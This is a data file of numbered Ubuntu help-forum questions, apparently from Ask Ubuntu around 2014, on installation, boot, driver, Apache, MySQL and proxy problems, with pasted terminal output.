489758	installed bugzilla , getting 404 from apache	thanks for looking at my question . i installed ubuntu ( 14.04 ) on vm virtualbox , set it up to serve with apache2 , works great . i can get pages to serve . i installed bigzilla with apt-get install bugzilla3 . it walked me through the config . everything seems fine . localhost/bugzilla returns 404 . i tried adding to apache2.conf : alias /bugzilla/ /usr/share/bugzilla3/web/ < directory /usr/share/bugzilla3/web > addhandler cgi-script .cgi .pl options +indexes +execcgi +followsymlinks directoryindex index.cgi allowoverride limit < /directory > that does n't work either . to be fair , when i add aliases to apache they never work .
489760	why does linux put marvell sata controllers in pata mode by default ?	i have a motherboard with a marvell sata controller . this controller is only used to drive the esata ports . by default ubuntu loads the pata_marvell module to drive these ports . however , pata does not support hot-swapping , which is a big drawback for an esata port . the workaround for this is to put options ahci enable_marvell=1 in /etc/modprobe.d/marvell-ahci.conf and then rebuild the initramdisks . this causes the ports to be controlled by ahci . why is pata_marvell the default ? why would i want to use it instead of ahci ? and are there any possible problems with using ahci ?
489762	how can i remove android and install ubuntu on my ramos w30 tablet ?	here are the specs of my ramos w30 : • operating system : android 4.0.3 • cpu chipset : samsung exynos4412 quad core processor • gpu : mali-400 quad core • ram1gb ddr3 • storage : 16gb • resolution : 1280 x 800 pixels
489763	do n't know how to save on mupen64plus	hey i got a question i 'm getting very irritated with , i do not know how to save on mupen64plus , i do n't know if your suppose to just save normally or if there is a key to push , i 've looked all over and ca n't find it . the only thing i find is how to find the folder for the save which i care nothing about , please help !
489764	sync contacts with ubuntu touch ?	i recently installed ubuntu touch using multirom ( recently being today ) . i was notified to sync my contacts upon opening either the dialer or the contacts app , but i brushed it aside to get back to what i was doing . now i would like to sync those contacts and i can not find anyway to re-gain access to that sync message . any help would be much appreciated !
489766	unity : are these bugs ?	ubuntu unity has some issues that i 'm not sure if they should be reported as bugs or is just my fad . run a command ( global shortcut alt + f2 ) can not find anything for files , calculator , text editor , screenshot etc . you have to type nautilus , gedit ... instead , but when you write fire , firefox pops as a result . is this panel a search or a run command ? because panel looks almost the same as the search your computer ... ( global shortcut super key ) . fells weird to lookup the same program with different keywords in a similar function panel . i know that in this examples files is a fancy label and nautilus is the actual program but the inconsistency is not appealing . any opened context menu blocks any global shortcuts . open a context menu with right click and than press volume down hotkey , you have to discard first the context menu . `` files/nautilus '' search is striped down just to the name and the file type , what about content , date , size etc ? add an online account from settings , each time search your computer ... is opened you 're asked to enter the password to unlock the keyring . thats ok , but the fact that you can not proceed with the initial task unless you enter the password is very annoying . pressing cancel does n't help either , it will pop out again and again for each account . the dialog also blocks any interaction with other programs opened , only the mouse pointer works . i would like to know if you experience the same issues and if you do , do you find them annoying as well ? some info about my installation : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy $ unity -- version unity 7.1.2
489769	how much hard drive space should i allocate to ubuntu ?	i am setting up virtualbox and i am allocating 4 gb ram ( on my 16 gb windows machine ) to ubuntu . however , i also need to choose a hard drive size . i 'm not sure what to choose . i want to experiment with lamp servers , do some coding/scripting , etc , but i do n't know a reasonable amount to allocate . 8 gb seems to be too limiting , but is 25 gb too much ? i have ~250 gb hard drive space left on my hard drive , also .
489771	compatibility of 14.04 and thinkpad carbon x1 2014	i am not sure what generation are those x1 laptops , so here are the specs : shop.lenovo.com/us/en/laptops/thinkpad/x-series/x1-carbon/ # techspecs anyone with 14.04 would like to share his/her experience ? i would like to buy one but could n't find a lot of information about 14.04 . any issues and workarounds ? pablo mentioned 14.04 with 2nd gen , but i am not sure what generation are the recent x1 . thanks !
489773	trouble installing apache2 on ubuntu 13.10	when i try to install apache2 sudo apt-get install apache2 i get this error . i suspect this has something to do with trying to install skype 32-bit on my 64-bit system . why is it trying to tell me about dependencies of other programs when i am trying to install only apache2 ? how can i get things working again ? thanks . reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : apache2 : depends : apache2-bin ( = 2.4.6-2ubuntu2.2 ) but it is not going to be installed depends : apache2-data ( = 2.4.6-2ubuntu2.2 ) but it is not going to be installed pychess : depends : python-support ( > = 0.90.0 ) but it is not going to be installed depends : python-gtksourceview2 but it is not going to be installed depends : python-glade2 but it is not going to be installed depends : python-gst0.10 but it is not going to be installed depends : python-rsvg but it is not going to be installed skype : i386 : depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed depends : libstdc++6 : i386 ( > = 4.2.1 ) but it is not going to be installed depends : libxss1 : i386 but it is not going to be installed depends : libxv1 : i386 but it is not going to be installed depends : libssl1.0.0 : i386 but it is not going to be installed depends : libpulse0 : i386 but it is not going to be installed depends : libasound2-plugins : i386 but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
489774	i keep getting kicked back to the login screen after fresh install	i have a separate home partition and recently installed ubuntu 14.04 on another partition than the one i originally had installed 14.04 on , as it had got too slow . now , whenever i try to log in , it accepts the password , the screen goes black , then i 'm deposited directly in front of the login screen again . any ideas ? i have a standard layout from what i have seen other people use with a separate home partition .
489775	incorrectly detected fakeraid destroyed data during install	i have attempted to install ubuntu 14.04 on my pc in parallel ( dual boot ) with windows xp . my pc has 2 sata disks , one was more-less devoted to the system , second one to data . however , when running ubuntu live cd , these two disks were detected as being in a raid . overlooking that and finishing the installation , it resulted in the loss of the data on my second disk . becoming reconciled with the data loss , i would still like to understand how it could happen , since i have never setup any kind of raid before on that pc ( and in windows the disks were working as non-raid ) . if a fakeraid signature can appear on disks without user action/knowledge ( may be already from manufacturer ? ) , having the fakeraid autodetection ( without checking if the disks contents really corresponds to a raid ) in the ubuntu installer would look like a quite serious flaw ... thanks .
489777	force pc to create a panic while booting up the livecd	i know this sounds like a silly question , but how do i force ubuntu 14.04 trusty tahr to kernel panic while i 'm booting up the livecd , can i just modify it so it displays the ubuntu logo for 5 seconds before panicking ? i know this is a silly question , but i 'm kinda curious , so , any help here ? i 'd love to use this for a prank .
489778	ubuntu on galaxy note 3 ?	i have samsung galaxy note 3 . i wan na install ubuntu on my phone . is that possible ? my phone has 64g sd card . thanks .
489780	getting `` bad taint not creating trace events '' error for sound codec and module	i 'm getting on boot up , sound codec and sound module both saying bad taint , not creating trace events and they are being ignored . obviously my sound card does n't work , i 've tried any number of fixes.. anyone know what this bad taint thing is and how to resolve it ?
489785	dual boot 14.04 and windows 7 but windows not booting	i installed 14.04 along side windows 7 . previously had option to select windows 7 or 12.04 . now system goes direct to 14.04 , no option for windows7 . windows shows up in the file system , seems to be fine , just ca n't get to windows 7 if i need to.boot
489787	jbd2 has a fork bomb ? kill -9 wont work ( ubuntu 12.04 )	this process is writing to my disk at 10mb/sec and i cant kill it . i think its a bug/fork bomb in ubuntu 12.04 . see : root @ beb : ~ # ps -efaww|grep jbd2 root 355 2 0 jun23 ? 00:31:13 [ jbd2/sda5-8 ] root 1458 2 0 jun23 ? 00:00:13 [ jbd2/sda6-8 ] root 8963 2 0 jun23 ? 00:00:02 [ jbd2/dm-3-8 ] root 23457 23053 0 10:13 pts/13 00:00:00 grep -- color=auto jbd2 root @ beb : ~ # kill -9 355 1458 8963 root @ beb : ~ # ps -efaww|grep jbd2 root 355 2 0 jun23 ? 00:31:13 [ jbd2/sda5-8 ] root 1458 2 0 jun23 ? 00:00:13 [ jbd2/sda6-8 ] root 8963 2 0 jun23 ? 00:00:02 [ jbd2/dm-3-8 ] root 23457 23054 0 10:13 pts/13 00:00:00 grep -- color=auto jbd2 root @ beb : /proc # lsof|grep jb lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/lmadmin/.gvfs output information may be incomplete . jbd2/sda5 355 root cwd dir 8,5 4096 2 / jbd2/sda5 355 root rtd dir 8,5 4096 2 / jbd2/sda5 355 root txt unknown /proc/355/exe jbd2/sda6 1458 root cwd dir 8,5 4096 2 / jbd2/sda6 1458 root rtd dir 8,5 4096 2 / jbd2/sda6 1458 root txt unknown /proc/1458/exe $ sudo iotop total disk read : 0.00 b/s | total disk write : 1966.97 k/s tid prio user disk read disk write swapin io > command 355 be/3 root 0.00 b/s 22.96 mb/s 0.00 % 93.93 % [ jbd2/sda5-8 ] how do i stop jbd2 ? thank you so much
489788	geany browser php execution	from another question , someone said i had to write php -s localhost:8080 -t `` % p '' -e & sensible-browser localhost:8080/ '' % f '' as the script to run . it does n't work , gives this : yes , that 's on localhost:8080/index.php . what 's happening ? more information : i had this working , but i 'm not sure what i did to make it stop working . i believe i re-installed apache or something like that .
489790	gnote annoying periodic undo	i 've been using gnote for years and have quite a few notes ( about 180 ) . now it 's becoming useless because of a very annoying bug : a few seconds after i start writing it `` revert '' the note and erases the first part of what i 'm writing , letting me typing to the end of the note . any idea why it 's happening and how i can fix it ? i 'm using the standard version installed with my ubuntu ( 3.6.0 ) . tia
489792	asus x750j not allowing me to boot ubuntu	i have tried installing ubuntu 14.04 multiple times on my asus x750j laptop . i have already put it on some of my other computers . however , when i attempt to put it on this laptop , it will not work . i replaced the hard drive that was in it with an ssd when i purchased it . i am able to boot ubuntu from my usb , and attempt to install and go through the entire process , however , when i try booting up my machine , there is no option for ubuntu and the partition i create for ubuntu is not listed as one of my boot options . when i go through the install and get to the part where i create the root partition for ubuntu , and click on install now , there is a warning message that says something about a reserve bios partition , so i tried making one , and then another warning came up as well , but i do not remember what it said . i can let you know if it is necessary . please assist as soon as possible .
489794	ca n't boot xp only ubuntu	i have used windows xp for years . i partitioned my hd with 300 gb for xp and 1 tb for ubuntu . i installed v.14.04 successfully . when booting i get a menu choice defaulting to ubuntu and then xp . selecting xp only brings me back to the boot menu . can the xp boot be repaired . as it is i can only get to my xp data through ubuntu . i would like to have a choice that works . i could not install ubuntu along side xp because the only given choice was another hd not the partition . update i ran boot-repair and testdisk trying to repair bootup . now i get grub recovery > and running my installation disk for ubuntu gets to the ubuntu window with the five moving dots and locks up . i have no idea what commands to use with grub recovery > and i ca n't get to a terminal without ubuntu running . i did try to recover windows xp boot without reloading xp thinking it might repair the bios . i also ran chkdsk /r . none of this helped ; i got the same result . thanks in advance for any suggestions .
489795	can a usb drive be accessible to the installer at the start of a cdrom-based system installation ?	i have a preseeding file , preseed.cfg , on a usb drive , and i 'd like to know if there 's some way to make this drive available to the installer during a cdrom-based installation . ( once the installation starts , there is actually the opportunity to get a shell and mount the usb drive , but the preseeds do n't seem to be read by the installer , so this opportunity may arrive already too late in the installation process to make the preseeding file available to the installer . btw , before hitting [ return ] on the installation menu , i hit [ tab ] , and edited the corresponding line by adding priority=critical preseed/file=/mnt/usb/preseed.cfg to it . of course , at the time i did this , /mnt/usb did not yet exist . ) a few possible approaches come to mind : if there is a way to tell the installer to restart the installation from the beginning ( without having to actually rebooting ) , then hopefully the usb drive would remain mounted and available to the installer from the beginning ; if there were a way to start the installation from a cli , rather than the graphical menu , then i could easily mount the usb drive before issuing the command to start the installer ; a third possibility ( actually , a special case of the previous one ) would to boot into the live image , and from there start the installer ( after mounting the usb drive , of course ) .
489797	unable to login into any account	how it happened my computer was becoming very unresponsive and i could not close any applications to free memory so i held the power button until the computer turned off . when i turned it on everything was ok except everytime i write my password the screen turns black some numbers such as # ff7e00 appear and the login screen pops up again . the computer was in some sort of login loop . lesson learned - never use the power button to power off . what i 've tried so far i have deleted /.xauthority to no avail i have tried to login as guest but also guest faces the same infinite login loop i have created a new account but i am unable to log into it as it also faces the same loop i have reinstalled lightdm but it wont login i have installed and switched to gdm but it also wont login i have installed and switched to xfce from the default ubuntu but it also wont login i have changed ownership ( chown ) of /home , home/user , /.xauthority etc . what i have not done download and install gnome ( is n't this doing the same as installing xfce ) download and reinstall ubuntu can someone please help me login to my account and/or explain what happened to cause this . thanks in advance .
489799	i can`t update ubuntu	this is what happens when i try to update , update manager ( requires installation of untrusted packages ) how can i fix this please
489800	my faenza icon theme contains an icon for spotify , but i ca n't seem to change the icon	so , i installed spotify ( on 14.04 ) using this method . it created a spotify folder in /opt/ . my faenza icon theme seems to work for almost all supported apps except for spotify . i tried changing the icons manually in the /opt/spotify/icons folder and that did n't work either . the spotify executable 's icon inside /usr/share/applications changed but whenever the app 's icon appears in the launcher , it 's still the original spotify logo . i even went to the root folder and tried searching for any other instances of the original logo , but could n't find any . here is a screenshot of the issue : any help would be appreciated .
489801	ca n't use seagate backup plus external hard drive on this laptop	so somebody is letting me use their laptop with ubuntu 13.10 on it , as my own laptop is currently needing repairs . i 'm very new to linux in general , so it 's like i 'm learning computers all over again . at the moment , i would like to use my 3 tb seagate external hard drive , but it does n't seem to be working on here . for a while , i got no reaction from plugging it in aside from the hard drive turning on ; the laptop did n't seem to acknowledge its existence . just briefly today , however , it noticed it when i plugged it in . it then disappeared , and i received this as i mentioned before , i 'm very new to linux as a whole , so i ca n't derive a whole lot of information from this . another problem is that the person letting me use this laptop does n't know their password , so i 'm restricted from using a lot of commands . if at all possible , i 'd like a method that does n't require the password , or if you happen to know how , a way to reset the password . if you need me to provide any more information , i 'll do as much as i can . any help would be appreciated .
489802	lenovo ideapad u430p audio , drivers	i have just ordered lenovo u430p , installed ubuntu 14.04 . everything worked like a charm , except the audio . though audio works and is detected by the system , the sound is very low as compared to windows 8.1 ( comes preinstalled ) . rahul @ rahul-ideapad-u430p : ~ $ uname -a linux rahul-ideapad-u430p 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux rahul @ rahul-ideapad-u430p : ~ $ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda intel hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : hdmi [ hda intel hdmi ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc283 analog [ alc283 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 rahul @ rahul-ideapad-u430p : ~ $ rahul @ rahul-ideapad-u430p : ~ $ lspci -v 00:00.0 host bridge : intel corporation haswell-ult dram controller ( rev 09 ) subsystem : lenovo device 3978 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:02.0 vga compatible controller : intel corporation haswell-ult integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3978 flags : bus master , fast devsel , latency 0 , irq 66 memory at b2000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:03.0 audio device : intel corporation haswell-ult hd audio controller ( rev 09 ) subsystem : lenovo device 3978 flags : bus master , fast devsel , latency 0 , irq 64 memory at b2610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:14.0 usb controller : intel corporation lynx point-lp usb xhci hc ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : lenovo device 3978 flags : bus master , medium devsel , latency 0 , irq 61 memory at b2600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation lynx point-lp heci # 0 ( rev 04 ) subsystem : lenovo device 3978 flags : bus master , fast devsel , latency 0 , irq 67 memory at b2618000 ( 64-bit , non-prefetchable ) [ size=32 ] capabilities : < access denied > kernel driver in use : mei_me 00:1b.0 audio device : intel corporation lynx point-lp hd audio controller ( rev 04 ) subsystem : lenovo device 3978 flags : bus master , fast devsel , latency 0 , irq 68 memory at b2614000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation lynx point-lp pci express root port 1 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : b2500000-b25fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation lynx point-lp pci express root port 3 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 memory behind bridge : b2400000-b24fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation lynx point-lp pci express root port 4 ( rev e4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=08 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : b1000000-b1ffffff prefetchable memory behind bridge : 00000000b0000000-00000000b0ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation lynx point-lp usb ehci # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3978 flags : bus master , medium devsel , latency 0 , irq 23 memory at b261c000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation lynx point-lp lpc controller ( rev 04 ) subsystem : lenovo device 3978 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation lynx point-lp sata controller 1 [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 3978 flags : bus master , 66mhz , medium devsel , latency 0 , irq 62 i/o ports at 5088 [ size=8 ] i/o ports at 5094 [ size=4 ] i/o ports at 5080 [ size=8 ] i/o ports at 5090 [ size=4 ] i/o ports at 5060 [ size=32 ] memory at b261b000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation lynx point-lp smbus controller ( rev 04 ) subsystem : lenovo device 3978 flags : medium devsel memory at b2619000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 5040 [ size=32 ] 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 10 ) subsystem : realtek semiconductor co. , ltd. device 0123 flags : bus master , fast devsel , latency 0 , irq 63 i/o ports at 4000 [ size=256 ] memory at b2504000 ( 64-bit , non-prefetchable ) [ size=4k ] memory at b2500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 02:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) subsystem : intel corporation wireless-n 7260 flags : bus master , fast devsel , latency 0 , irq 65 memory at b2400000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi
489803	ubuntu launcher not on top of other windows	the problem : if a window is placed under the ubuntu launcher or the hud , any clicks will be registered to the window and not the launcher . example : 1 ) launcher is set to `` always show '' 2 ) nautilus window is dragged so the close button is located under the launcher 3 ) click on the close button `` through '' the launcher , the window closes , instead of launching an application on the launcher . same happens when the launcher is set to `` autohide '' . any suggestions ?
489805	remove chromium data	after not getting any response for my question , i think i should uninstall and remove data of chromium from ubuntu . as uninstalling chromium does not remove its data ( like browser history , settings ) , i want to know where are the data of chromium located and how to remove them safely ?
489806	find a file in ubuntu	so my friend wanted to play grand fantasia with him so i had downloaded it previously on windows , once the windows broke and i went to ubuntu i wanted to try and install it onto ubuntu thinking i could try and work it on wine and if it did n't i could just uninstall it from the folder on my desktop , in the end it did n't work and now i have to hunt it down but i ca n't find it , it 's one point four gig and i need help finding it it said it installed on the c drive but i do n't know where to start or how the filing system works on ubuntu . if it helps i have ubuntu 14.04 .
489807	ca n't upload .sql file	environment : ubuntu 14.04 ( local dev machine running under virtualbox ) apache/2.4.7 ( ubuntu ) phpmyadmin 4.0.10deb1 i 'm getting the below error . i 've been reading the manual and searching posts but none of the suggestions are helping . i 'm pretty new to linux and apache so i could just be not understanding something . warning : unknown : open_basedir restriction in effect . file ( /tmp ) is not within the allowed path ( s ) : ( /usr/share/phpmyadmin/ : /etc/phpmyadmin/ : /var/lib/phpmyadmin/ : /usr/share/php/php-gettext/ : /usr/share/javascript/ ) in unknown on line 0 warning : file upload error - unable to create a temporary file in unknown on line 0 no data was received to import . either no file name was submitted , or the file size exceeded the maximum size permitted by your php configuration . see faq 1.16 the error is coming form phpmyadmin . i have tried to upload via the command line and it just hangs until i quit . i made the following changes to /etc/php5/apache2/php.ini post_max_size = # > db size = 60m memory_limit = # > post_max_size = 256m upload_max_filezise = # < post_max_size 20m and have tried changed documentroot in /etc/apache2/sites-available/000-default.conf tried setting php.ini - upload_tmp_dir tried adding the folder the .sql file is in to apache.conf php_admin_value open_basedir - this only changed the error message . one thing i did a long time ago was to have apache run under my user account . i 'm wondering if this is n't the problem .
489808	not detecting windows 8.1 , etc	trying to install 14.04 version om my computer . i have one hard drive into three partitions . i have window 8.1 on my computer on the first partition . however , every time , i try to install version 14.04 , it is not detecting windows 8.1 . i keep getting a message : no operating system on this computer . further , it is no detecting my flash drive . i have also gotten an error message : serious errors on drive while check / . press i for ignore , s for mounting and m for manual recovery . this ubuntu os is full of bugs and not compatible with windows 8.1
489814	basic outgoing mail function	i 've looked for tutorials and guides about this topic but seems really complicated to make it work . i 'm working with php , i would like to send mails in some scenarios such as password recovery and email confirmation ... and i 'm running all those projects in my ubuntu 14.04 server as a vps digital ocean droplet ... but after trying for days i ca n't make it works ... . since almost every guide is made as a full email server configuration what i want is just to set a mail system which aloe me to send basic mail as i said before but having it secure and with a good performance ... . what should i do ? what 's the best way to accomplish it ? thank you very much
489815	can not install mysql-server-5.5/the following packages have unmet dependicies	i 'm a newbie here so please bare with me . i 'm using ubuntu 14.04 . i tried entering mysql with the following command : mysql -u root -p and i got the following message : the program mysql can be found on the following packages : mysql-client-core-5.5 / mariadb-client-core-5.5 / mysql-client-core-5.6 / percona-xtrabd-cluster-client-5.5 ( each slash represents a new option . sorry but i could n't put them into a list ) i then typed in : sudo apt-get install mysql-client-core-5.6 after this was installed , i tried connecting to mysql again using : mysql -u root -p i then got the error message : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) after searching online , i found out i needed to install mysql server and so i wrote in the following command sudo apt-get install mysql-server i then got the message ; some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've been looking on line for the past hour for a solution but other people who had a similar error but had it from upgrading mysql and thus there solution were ineffective for me . please help . thanks .
489820	3g evdo usb modem speed limited on ubuntu 14.04	i installed ubuntu 14.04 on a hp dv6 laptop . i connect to the internet via a 3g evdo usb modem ( cdma ) of capitel make from bsnl kolkata , device id 1c9e:9e00 . making this modem get detected by ubuntu needs an extra step since ubuntu 12.04 . i have to type in at the terminal : sudo modprobe usbserial vendor=0x1c9e product=0x9e00 and after waiting a bit the modem shows up in the network manager list , from where i use edit connections to type in the username and password . the modem does connect to the internet but this time i noticed that the speed is limited to 123 kbps instead of the 300 kbps that i get when using windows 7 or windows 8 . this problem was not there , as far as i am aware , in previous versions of ubuntu . this speed limitation of 123 kbps also exists in linux mint 17 ( both cinnamon and mate ) . how do i go about diagnosing what is actually causing this 3g modem to limit its speed to 123 kbps when used in ubuntu 14.04 ?
489822	does ubuntu support nvidia and ati graphics cards ?	does ubuntu support nvidia and ati graphics cards ? are drivers for the graphics card available ? i ask this because when i installed ubuntu in a flash drive and ran it on my pc with a msi nvidia geforce 210 graphics card , i did n't see anything on the display . but when i tried it with the default intel graphics card on my pc it worked perfectly . please help
489825	where should i place the .htpasswd file ( phpmyadmin ) ?	i am following this tutorial setting up phpmyadmin : https : //www.digitalocean.com/community/tutorials/how-to-install-and-secure-phpmyadmin-on-ubuntu-12-04 i edit the .htaccess file at /usr/share/phpmyadmin/.htaccess but i need to point it to a .htpasswd file of my choice . can i put it in /usr/share/phpmyadmin so it 's next to .htaccess ? or can i put it in /var/www ?
489826	guest session on server	i want to execute user supplied codes as guest session so it will not affect the opperationg system . when the server is running , is it possible to log create a guest session on server and execute user supplied codes on that session ? i 'm trying to use lxc , but it seems to very slow .
489830	how can i repair video when i can not see the screen ?	background : i have an old 1.6 ghz pc 2gb ram with an nvidia geforce fx 5500 graphics card and a broadcom 4318 wifi . one drive is pata and one is sata . one contains xp and one had an ntfs partition for xp and a partition for ubuntu 12.04 and many earlier versions . i used gparted to shrink the 12.04 partition to make room for 14.04 . after install i did not see it appear in the grub menu until 12.04 upgraded from -64 to -65 . then three choices appeared for 14.04 : ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os 'gnulinux-simple-uuid - > ubuntu , with linux 3.13.0-24-generic ' -- class gnu-linux -- class gnu -- -- class os 'gnulinux-3.13.0-24-ge- > ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu -- class os 'gnuli- > the lines are incomplete because they were off my screen but all referred to 1.13.0-24 . both hard drives have the boot flag set and i think sdb is the second drive with only xp on it . i think sda2 has 12.04 and sda5 , 14.04 . after they showed up i activated the wi-fi with : sudo b43-fwcutter -w /lib/firmware broadcom-wl-5.100.138/linux/wl_apsta.o because 14.04 was exceedingly slow , i found : https : //sites.google.com/site/easylinuxtipsproject/first which described how to disable 3d graphics among other things which it said to do in the order given . step 2 recommended replacing the graphics driver and i had already done that in 12.04 to nvidia-173.14.39 so that step seemed perfectly reasonable . after the reboot in step 1.5e the screen stayed blank . by booting into 12.04 i can see that the 4 lines were added in : /etc/sysctl.conf regarding vm.swappiness and vm.vfs_cache_pressure . so that is how i got here . i can read/write all the 14.04 files from 12.04 and can get to the root terminal by booting in the recovery mode . i tried : sudo apt-get purge nvidia* sudo apt-get nvidia-uninstall in hopes that i could revert to nouveau . slow is better than blind . i can reallocate the partition with 14.04 and start over but am hoping for another approach .
489835	bitlocker & win7 on one partition , ubuntu & encryption on another , same drive	i have a laptop with a 64gb ssd and 1tb regular drive . the 64gb ssd has win7 installed on it . the 1tb drive is partitioned into 500gb as ntfs , 480gb for ubuntu / , and the rest for ubuntu swap . for whatever reason , ubuntu ca n't see the ssd , so to choose my os at boot i just change the drive boot order . i can live with this . i want to encrypt the win7 stuff ( ssd + half the 1tb ) with bitlocker . i also want to encrypt the ubuntu partitions with whatever is appropriate . never having done this before , my concern is that using two schemes on the same drive will hose the whole arrangement . can this be safely done ?
489844	sctp tunable parameters for load testing	i am using sctp on ubuntu 10.04 , with multicore cpu . i want to test load on one sctp port.tried to change params sctp_rmem , sctp_wmem and sctp_mem . but not able to receive maximum call/sec . with increasing number of request say 1 lacs total request with 2000 call/sec . then all messages ( 1lacs ) are not exchanged . please help me - which params need to be tune ? - how to check whether buffer is full or not ? thanks and regards , abhishek misra
489845	processor & graphics card .. better compatibility in ubuntu	i was wondering among the two below mentioned combinations , which one would offer better performance and better compatibility with ubuntu . the reason for this post is because i have always got negative reviews about radeon graphics in ubuntu , however , looks like nvidia 820 is optimus , whose support is ..well ..we all know about . amd quad core a6-6310 and amd radeon hd r5 m230 ( 2gb dedicated graphics ) with 4gb ram intel i5 4210u ( 4th gen ) and nvidia 820m ( 2gb dedicated graphics ) with 4gb ram
489846	grub error : `` error : unknown filesystem '' when attempting to boot	i have dual boot with windows xp and ubuntu 14.04 . everything was fine till yesterday ! ! today , when i try to open my computer , there is no boot menu . only a black screen showing error message : '' error : unknown filesystem entering rescue mode ... grub rescue > .. '' please help me . how to solve this ? ? ?
489847	stuck on grub , ca n't load ubuntu	i had rhel-5.5 installed on my servers with 8 partitions . i wanted to install ubuntu-12.04 . so , i formatted the drive and installed ubuntu-12.04 through usb . but i am stuck at grub screen . on a black screen `` grub '' is written there and it sticks there . please suggest what to do in order to load ubuntu .
489851	ubuntu on lenovo g50-70/g40-70	i am shopping around for a new laptop and came across lenovo g50-70/g40-70 on the market which has an option of not having any os installed . i regularly use windows , but in the recent years i am seeing ubuntu being more and more of a better option hence having a clean laptop will mean i can start off with ubuntu right off the bat . i have used ubuntu before but that laptop broke down so i did not continue on as my new laptop had windows pre-installed . i saw a few threads on one or 2 driver issues , but i guess it is because of the lack of internet connection to properly configure the system hence i doubt that will be an issue on my side as i have an option to work off a wired internet connection ( of course , provided that the driver for the lan card is set up right ! ) my main concern is the driver compatibility , as i am concerned about losing some of the functions that the laptop provides . has anyone gotten a completely working system up before ? thanks for the help in advance !
489852	proxy authentication with terminal ubuntu 14.04	i would like to access the internet to update files etc . from the terminal on a secured proxy network . i 've already tried the following : adding to /etc/apt/apt.conf , /etc/apt/apt.conf.d/01proxy , /etc/apt/apt.conf.d/01ubuntu : acquire : :http : :proxy `` http : //name : password @ proxy_server : port '' ; export http_proxy=http : //name : password @ proxy_server : port/ on a terminal . adding export http_proxy=http : //name : password @ proxy_server : port/to /etc/bash.bashrc these were few of the major efforts . there are no spaces in my username nor are there any special characters in my password ( especially `` @ '' ) . i 've double checked and all the information entered is correct . the info is correct because it works with the browser ( manual proxy in network and authentication when first opened the browser ) . i 've also tried by making the `` p '' in `` proxy '' into capitals but to avail . i always get the error : 407 proxy authentication required . any help is appreciated .
